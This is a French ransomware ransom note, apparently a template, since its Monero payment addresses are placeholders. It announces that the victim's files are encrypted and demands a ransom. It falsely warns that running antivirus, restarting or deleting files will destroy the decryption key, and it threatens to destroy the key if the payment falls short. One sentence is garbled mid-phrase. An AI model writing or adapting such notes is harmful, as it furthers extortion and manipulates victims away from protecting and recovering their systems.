Oh non ! On vient de chiffrer toutes vos données.

Que vient t-il de ce passer ?

Vous venez d'étre infécté par un ransomware. Tout vos fichiers sont chiffrés,
et nous sommes les seuls à avoir la clé pour les déchiffrer. Nous vous recommandons
de ne pas effetuer des actions telles que activer votre antivirus, redemarrer votre ordinateur
ou supprimer des fichiers, car cela detruirait votre la clé.


Est-ce que je peux récuperer mes fichiers ?

Nous comprennons que vous voulez recuperer vos fichiers. Contrairement aux autres
ransomwares, vous pouvez les recuperer, et nous vous le garantissons.
Pour ce faire, il vous suffit de suivre les instructions present dans la section "Comment je paye"


Comment je peux recuperer mes fichiers ?

Nous n'acceptons que le Monero(BTC). Pour faire en sorte de recuperer vos fichiers, vous
devez acheter du Monero, et nous faire un transfer a l'addresse(s) indiquée ci-dessous.
    - ?
    - ?
    - ?
Si vous avez besoin de plus d'informations, vous pouvez aller ici : <https://www.getmonero.org/get-started/what-is-monero/>
et ici <https://www.binance.com/en/buy-Monero>. Nous devons recevoir un montant supérieur
ou égal au montant de la rançon, ou sinon nous détruirons la clef de déchiffrement.


Comment je paye ?

Une fois que vous avez complété le paiement, vous devez nous envoyer un message contenant les informations
suivantes : le montant que vous nous avez envoyé; la date exacte de l'envoi; l'ID du ransomware;
une adresse e-mail valide.
pas le programmze de déchiffrement, et la clef de déchiffrement sera détruite. Si tout est en ordre,
nous vous enverrons un mail contenant le programme de déchiffrement.






























